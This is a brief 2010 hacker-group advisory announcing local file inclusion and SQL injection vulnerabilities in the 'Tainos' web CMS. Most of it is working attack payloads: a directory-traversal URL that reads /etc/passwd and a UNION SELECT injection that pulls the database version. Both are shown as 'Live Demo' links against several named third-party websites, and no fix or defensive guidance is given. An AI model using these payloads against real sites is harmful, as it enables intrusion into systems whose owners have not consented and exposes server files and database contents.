======================================================= Tainos Multiple Vulnerabilities ======================================================= ######################################## # Name: Tainos Multiple Vulnerabilities # Vendor: www.tainos-webdesign.com # Date: 2010/05/16 # Author: Ashiyane Digital Security Team # Discovered: XroGuE # Thanks to: Virangar,Ali.Eagle,Satanic2000,Ashiyane Members # Contact: Xrogue_p3rsi4n_hack3r@Hotmail.com ######################################## ######################################## [+] Local File Include Vulnerability: [+] Vulnerability: www.Site.com/[path]/Page.php?page=[LFI] [+] Live Demo: http://www.ain-dominican-realestate.com/index_offer.php?page=../../../../../../../../../../etc/passwd [+] Live Demo: http://www.mel-tour.com/nederlands/tours.php?page=../../../../../../../../../../etc/passwd ######################################## ######################################## [+] SQL Injection Vulnerability: [+] Vulnerability: /www.site.com/index.php?id=[SQLi] [+] Live Demo: http://www.sosuanews.com/index.php?id=-9999+union+all+select+1,2,@@version,4,5 ######################################## _________________________________________________________________ Hotmail: Powerful Free email with security by Microsoft. https://signup.live.com/signup.aspx?id=60969